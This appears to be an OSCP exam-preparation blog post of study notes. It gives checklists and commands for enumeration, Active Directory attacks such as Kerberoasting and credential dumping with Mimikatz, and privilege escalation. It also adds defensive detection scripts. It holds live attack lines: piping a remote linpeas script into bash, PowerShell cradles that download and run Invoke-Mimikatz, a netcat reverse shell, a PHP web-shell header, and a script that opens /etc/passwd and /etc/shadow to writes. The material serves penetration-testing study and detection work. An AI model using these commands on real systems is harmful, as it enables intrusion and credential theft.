Offensive Security Rants & Threat Actor Roleplay
21 April 2022
I passed my OSCP in 2022 and wanted to contribute to the many helpful posts providing tips, tricks, and resources. I would also recommend referencing my GitBook for additional tooling and methodology.
Please keep in mind while reading this post that these are pretty much a direct copy of my rough notes. As a result, there may be some unfinished thoughts, commands, and checklists contained within. Simple checklists help me not overthink - which coincidentally is my piece of advice for anyone attempting the OSCP.
Make sure while studying for the OSCP that you take lots of breaks, enjoy some coffee, and spend time with your friends and family. It’s no secret that the OSCP is tough, but struggling to exploit a machine or pass the first time doesn’t mean you’re any less of a hacker than the rest of us.
These are articles that Offensive Security has created and will answer several questions you may have about the exam. For example, what tooling is allowed and what the exam structure will look like.
Resources from the community that I found helpful while preparing for my exam.
Resources that I recommend checking out while preparing for the OSCP. For my preparation, I completed every Proving Ground Practice machine and several NetSecFocus HackTheBox recommendations. Additionally, I found S1REN's walkthroughs incredibly helpful; they provide a great view of how you should be tackling machines.
This is my generic checklist and a baseline for every single box:

```bash
nmap -sV -sC -p- --min-rate=1000 -iL [scope] -oA Full-TCP-Scan
nmap -sUC --top-ports 1000 --min-rate=1000 -iL [scope] -oA Top-1000-UDP-Scan
nikto $ip
nslookup $ip
dig axfr $ip
```
Simple notes for Active Directory during the OSCP:

```cmd
# Enumerate all local users
net user
# Enumerate all users in the domain
net user /domain
# Enumerate a specified user
net user $username /domain
```
1. Gain access to a domain user account.
2. Enumerate the domain with the commands listed above.
3. Enumerate all computers on the domain. Don't just enumerate one computer. Enumerate them all.
4. Enumerate all users logged onto computers that we have local administrator access to.
5. Kerberoast with any user account acquired (GetUserSPNs, Invoke-Kerberoast, etc)
6. Attempt credential-based attacks against all discovered user accounts.
7. Pass the Hash to pivot (Also try to Pass the Ticket if applicable).
8. Run Mimikatz on all systems (Can also run LSASSY with CrackMapExec).
9. Enumerate password hashes and tickets: `sekurlsa::logonpasswords` and `sekurlsa::tickets`.
This checklist serves as a very basic web server checklist:
- Check `robots.txt` to enumerate any additional information about the site.
- Brute-force directories with file extensions, e.g. `-x php,html,sh`.
- Try default credentials (`admin:admin`) or credentials identified via Google for the application.
- `sslscan $ip`
This checklist serves as a very basic Windows checklist:
- Run SMBMap against any identified SMB services: `smbmap -H $ip`
- Access SMB shares manually with smbclient: `smbclient //$ip/$share` (forward slashes avoid having to escape backslashes in the shell)
- Revisit all services with any identified credentials such as SSH, SMB, FTP, HTTP.
- Get the naming context of LDAP: `ldapsearch -h $ip -x -s base namingcontexts`
- After identifying the naming context, enumerate more: `ldapsearch -h $ip -x -b "DC=htb,DC=local"`
- Enumerate RPC with rpcclient: `rpcclient -U '' $ip`
- Some interesting rpcclient commands are: `enumdomusers`, `queryuser parzival`, `querydomgroups`, and `querydispinfo`
- Enumerate LDAP once credentials have been identified: `ldapsearch -x -h $ip -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TDL>"`
- Test WebDAV with davtest: `davtest -auth $user:[PASSWORD] -sendbd auto -url http://$ip`
This checklist serves as a reminder for what I needed to install prior to taking my OSCP exam; you don't want to spend the first few hours of your exam setting up an environment:
- Update the searchsploit database: `searchsploit -u`
```bash
# Full-TCP-Scan
nmap -sV -sC -p- --min-rate 1000 -T4 $ip -oA Full-TCP-Scan
# Top-UDP-Scan
nmap -sU --top-ports 1000 -T4 $ip -oA Quick-UDP-Scan
# Vulnerability Scan
nmap -p $discoveredports --script=vuln $ip -oA Vuln-Scan
```
- While `nmap -sC` should successfully enumerate users via the ident service, it is always good to double check: `ident-user-enum $ip 22 53 113`
- Alternate User-Agent header: `User-Agent: Googlebot/2.1 (+http://www.googlebot.com/bot.html)`
- Nested `url=` parameter chain: `http://:8080/?url=http://127.0.0.1:8080/?url=http://<RESPONDER_IP>`
- WebDAV password file: `/var/www/html/webdav/passwd.dav`
- Look for `.sh` files; this directory exists when Apache hands a file over to bash or another scripting language.
- If a username such as `parzival` is found, try logging in with the password `parzival`.
- Default credentials: `admin:admin`
- Use the SMTP `VRFY` command to enumerate a valid email prior to execution.
- User-Agent payload: `User-Agent: <?php system(\$_GET['c']); ?>`
- `searchsploit postfix`
- Check for an `id_rsa` file for any users that have been enumerated.
- `uname -a`
- `/etc/shadow`
- `curl 10.10.10.1:8080/linpeas.sh | bash`
- `which awk perl python ruby gcc cc vi vim nmap find netcat nc wget tftp ftp 2>/dev/null`
- `mysql -u root -p`
- `docker images` and `docker run -v /:/mnt --rm -it [IMAGE] chroot /mnt sh`
- `export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin` (the `export` and the assignment must be on one line)
PowerShell Empire's module source includes `Invoke-Watson` and `Invoke-MS16032` as examples. Their `Mimikatz.ps1` is also great. These can be accessed at the following location on Kali: `/usr/share/powershell-empire/empire/server/data/module_source/`
```cmd
reg query HKCU /f password /t REG_SZ /s
reg query HKCU /f pass /t REG_SZ /s
```
- Windows binaries shipped with Kali: `/usr/share/windows-binaries`
- `set PATH=%SystemRoot%\system32;%SystemRoot%;`

```powershell
powershell IEX (New-Object System.Net.Webclient).DownloadString('http://10.10.10.1:8080/Invoke-Mimikatz.ps1') ; Invoke-Mimikatz -DumpCreds
powershell IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.119.164:8080/Invoke-Mimikatz.ps1') ; Invoke-Mimikatz -Command lsadump::sam
```
- Check `C:\Program Files (x86)` for any outdated and vulnerable installations.
- Use the `runas` command in combination with a binary like netcat: `runas /env /profile /user:[DOMAIN]\Administrator "C:\Windows\Tasks\nc.exe -e cmd.exe $attackerip 443"`
Some additional resources I referenced throughout Windows privilege escalation
We can privesc in multiple ways from running this script. For example, we can add a root user to the /etc/passwd file or we can run `/bin/bash -p` to obtain a shell with root privileges.

```python
import os

# Each hook runs a shell command as whichever user executes this script (root, in this scenario).
def stop(text, value):
    os.system("chmod 777 /etc/passwd")   # make /etc/passwd world-writable

def reset(text, value):
    os.system("chmod +s /bin/bash")      # set the setuid bit on bash (then /bin/bash -p)

def start(text, value):
    os.system("chmod 777 /etc/shadow")   # make /etc/shadow world-writable
```
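The three hooks above leave distinctive traces on the host: a world-writable `/etc/passwd` or `/etc/shadow`, and a setuid bit on `/bin/bash`. As an added example (not code from the original post), the Python below audits permission bits against an assumed baseline and reports exactly those conditions, so a defender or a post-exam cleanup can spot them. The expected modes are an assumption based on Debian/Ubuntu defaults; stricter modes (such as `0o000` on `/etc/shadow` on RHEL-family systems) are not reported.

```python
import os
import stat

# Assumed permission baselines (Debian/Ubuntu defaults); adjust for your distribution.
EXPECTED_MODES = {
    "/etc/passwd": 0o644,
    "/etc/shadow": 0o640,
    "/bin/bash": 0o755,
}


def findings_for_mode(path, mode, expected_mode):
    """Pure check on a mode value (as returned by stat.S_IMODE); returns a list of findings."""
    perm = mode & 0o777
    findings = []
    if perm & stat.S_IWOTH:
        findings.append(f"{path}: world-writable ({oct(perm)})")
    if mode & (stat.S_ISUID | stat.S_ISGID):
        findings.append(f"{path}: setuid/setgid bit set ({oct(mode)})")
    # Any permission bit set here that the baseline does not grant is "looser than baseline";
    # a stricter mode (fewer bits) is not a finding.
    if perm & ~expected_mode & 0o777:
        findings.append(f"{path}: looser than baseline {oct(expected_mode)} (found {oct(perm)})")
    return findings


def audit_path(path, expected_mode):
    """stat() one path and return its findings; an empty list means it matches the baseline."""
    try:
        st = os.lstat(path)
    except FileNotFoundError:
        return [f"{path}: missing"]
    return findings_for_mode(path, stat.S_IMODE(st.st_mode), expected_mode)


def audit_system(expected=EXPECTED_MODES):
    """Audit every baseline entry and return {path: findings} for problem paths only."""
    results = {}
    for path, mode in expected.items():
        findings = audit_path(path, mode)
        if findings:
            results[path] = findings
    return results


if __name__ == "__main__":
    for path, findings in audit_system().items():
        for finding in findings:
            print("FINDING:", finding)
```

`findings_for_mode` is separated from the filesystem call so the logic can be checked against mode values directly; `audit_system` is what you would schedule or run from a file-integrity check.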
`GetUserSPNs.py -request 'DOMAIN/MACHINE$' -dc-ip $dcip -hashes 'LM:NTLM'`

```cmd
net user
net user /domain
net user $user /domain
net group /domain
net accounts
```

Run `klist` to see if there are any tickets stored in memory. This can also be performed with Mimikatz by running: `kerberos::list /export`

Crack the exported tickets with `tgsrepcrack.py` or your favorite password cracking tool.

PowerView:

```powershell
Get-NetLoggedOn -ComputerName [COMPUTER]
Get-NetSession -ComputerName [DC]
Get-NetUser -SPN | select serviceprincipalname
```

Perform Kerberoasting with PowerView's [Invoke-Kerberoast](https://www.pentestpartners.com/security-blog/how-to-kerberoast-like-a-boss/): `Invoke-Kerberoast -OutputFormat HashCat | Select-Object -ExpandProperty hash`
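Kerberoasting, whether via GetUserSPNs, Invoke-Kerberoast, or step 5 of the Active Directory checklist earlier in this post, shows up on the domain controller as a burst of service-ticket requests (Security Event ID 4769) for several SPNs with the RC4 encryption type (0x17). The Python below is an added example that is not part of the original post: it runs that detection over constructed 4769 records. The data is sample data, not real logs; HTB.LOCAL is the domain from the ldapsearch example above, and the account and service names are made up.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of Security Event ID 4769 fields (TargetUserName = account,
# ServiceName = service, TicketEncryptionType = enc, Status = status). Not real logs.
EVENTS = [
    {"time": "2022-04-21T10:00:01", "account": "jdoe@HTB.LOCAL", "service": "svc_sql", "enc": "0x17", "status": "0x0"},
    {"time": "2022-04-21T10:00:02", "account": "jdoe@HTB.LOCAL", "service": "svc_http", "enc": "0x17", "status": "0x0"},
    {"time": "2022-04-21T10:00:02", "account": "jdoe@HTB.LOCAL", "service": "svc_backup", "enc": "0x17", "status": "0x0"},
    {"time": "2022-04-21T10:00:03", "account": "jdoe@HTB.LOCAL", "service": "svc_ftp", "enc": "0x17", "status": "0x0"},
    {"time": "2022-04-21T10:00:03", "account": "jdoe@HTB.LOCAL", "service": "WS01$", "enc": "0x17", "status": "0x0"},
    {"time": "2022-04-21T10:05:00", "account": "asmith@HTB.LOCAL", "service": "svc_sql", "enc": "0x12", "status": "0x0"},
    {"time": "2022-04-21T10:00:00", "account": "bbob@HTB.LOCAL", "service": "svc_sql", "enc": "0x17", "status": "0x0"},
    {"time": "2022-04-21T10:20:00", "account": "bbob@HTB.LOCAL", "service": "svc_http", "enc": "0x17", "status": "0x0"},
    {"time": "2022-04-21T10:40:00", "account": "bbob@HTB.LOCAL", "service": "svc_backup", "enc": "0x17", "status": "0x0"},
]

RC4_ETYPES = {"0x17", "0x18"}   # RC4-HMAC and RC4-HMAC-EXP ticket encryption types


def kerberoast_candidates(events, window=timedelta(minutes=5), min_spns=3):
    """Return {account: set(services)} for accounts that obtained at least `min_spns`
    distinct RC4-encrypted service tickets within any interval of length `window`."""
    per_account = defaultdict(list)
    for e in events:
        if e["status"] != "0x0" or e["enc"].lower() not in RC4_ETYPES:
            continue  # failed requests and AES tickets are not the Kerberoast pattern
        svc = e["service"]
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue  # machine accounts and the TGT service are not roastable targets
        per_account[e["account"]].append((datetime.fromisoformat(e["time"]), svc))

    flagged = {}
    for account, reqs in per_account.items():
        reqs.sort()
        # Sliding window: starting from each request, collect distinct services seen
        # within `window`; the first window that reaches min_spns flags the account.
        for i, (t0, _) in enumerate(reqs):
            in_window = {svc for t, svc in reqs[i:] if t - t0 <= window}
            if len(in_window) >= min_spns:
                flagged[account] = in_window
                break
    return flagged


if __name__ == "__main__":
    for account, services in kerberoast_candidates(EVENTS).items():
        print(f"possible Kerberoasting by {account}: {sorted(services)}")
```

On the sample, `jdoe` is flagged (four distinct SPNs requested with RC4 in two seconds; the `WS01$` request is ignored), `asmith` is not (AES ticket), and `bbob` is not with the default five-minute window because the three requests are twenty minutes apart. Widening the window to an hour flags `bbob` too, which is the usual tuning trade-off for slow-and-low roasting.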
- curl: `curl http://$attackerip/winpeas.exe -o winpeas.exe`
- wget: `wget http://$attackerip/winpeas.exe -O winpeas.exe`
1. `impacket-smbserver parzival [TARGET_DIRECTORY]`
2. Validate the share is accessible: `net view $attackerip`
3. Copy the file to a local directory: `copy \\$attackerip\parzival\winpeas.exe`
4. Alternatively, run the file directly from the SMB share: `\\$attackerip\parzival\winpeas.exe`
```powershell
(New-Object System.Net.WebClient).DownloadFile("http://$attackerip/winpeas.exe", "C:\Windows\Temp\winpeas.exe")
Invoke-WebRequest "http://$attackerip/winpeas.exe" -OutFile "C:\Windows\Temp\winpeas.exe"
powershell.exe -c "iwr http://$attackerip/winpeas.exe -OutFile C:\Windows\Temp\winpeas.exe"
```
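Every transfer method on this page that goes through PowerShell (the `DownloadString` cradles in the Windows privilege escalation section and the `DownloadFile`/`Invoke-WebRequest`/`iwr` forms here) is recorded by PowerShell script block logging (Event ID 4104) when it is enabled. As an added example that is not from the original post, the Python below triages script-block text for those download cradles, rating download-and-execute (`IEX` combined with a download) higher than a plain download to disk. The sample script blocks are constructed; the host and file names in them are placeholders.

```python
import re

# Constructed sample ScriptBlockText values (Event ID 4104), not captured from a real host.
SAMPLE_BLOCKS = {
    "cradle_iex": "IEX (New-Object System.Net.Webclient).DownloadString('http://10.10.10.1:8080/tool.ps1')",
    "cradle_file": '(New-Object System.Net.WebClient).DownloadFile("http://10.10.10.1/winpeas.exe", "C:\\Windows\\Temp\\winpeas.exe")',
    "cradle_iwr": "iwr http://10.10.10.1/winpeas.exe -OutFile C:\\Windows\\Temp\\winpeas.exe",
    "benign": "Get-ChildItem C:\\Windows\\Temp | Where-Object { $_.Length -gt 1MB }",
}

# Download primitives seen in the cradles above. re.S lets `.*?` span line breaks in
# multi-line script blocks; the lookarounds keep `iwr`/`iex` from matching inside other words.
DOWNLOAD_PATTERNS = {
    "webclient_downloadstring": re.compile(r"Net\.WebClient.*?\.DownloadString\s*\(", re.I | re.S),
    "webclient_downloadfile": re.compile(r"Net\.WebClient.*?\.DownloadFile\s*\(", re.I | re.S),
    "invoke_webrequest": re.compile(r"(?<![\w-])(Invoke-WebRequest|iwr)(?![\w-])", re.I),
}
EXEC_PATTERN = re.compile(r"(?<![\w-])(Invoke-Expression|iex)(?![\w-])", re.I)
URL_PATTERN = re.compile(r"https?://[^\s'\")]+", re.I)


def classify_script_block(text):
    """Rate one script block: 'high' for download + in-memory execution, 'medium' for a
    download primitive alone, 'none' otherwise. Also returns the URLs to pivot on."""
    downloads = [name for name, rx in DOWNLOAD_PATTERNS.items() if rx.search(text)]
    executes = EXEC_PATTERN.search(text) is not None
    urls = URL_PATTERN.findall(text)
    if downloads and executes:
        severity = "high"      # fetch-and-run in memory: nothing touches disk for AV to see
    elif downloads:
        severity = "medium"    # file lands on disk or in a variable; review URL and destination
    else:
        severity = "none"
    return {"severity": severity, "downloads": downloads, "executes": executes, "urls": urls}


def triage(blocks):
    """Classify a {name: script_block_text} mapping and return {name: result}."""
    return {name: classify_script_block(text) for name, text in blocks.items()}


if __name__ == "__main__":
    for name, result in triage(SAMPLE_BLOCKS).items():
        print(f"{name}: {result['severity']} {result['urls']}")
```

The regexes are deliberately narrow so the example stays readable; in production you would also fold in `Start-BitsTransfer`, `certutil -urlcache` and base64-encoded command lines, and correlate the URL with proxy logs.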
While the Buffer Overflow has since been removed from the exam environment, it still provides a great introduction to low-level exploit development. After obtaining your shiny new certification, I would still recommend checking out publicly available resources.
Common bad characters:
- NULL (`\0`)
- Tab (`\t`)
- Line Feed (`\n`)
- Carriage Return (`\r`)
- Form Feed (`\f`)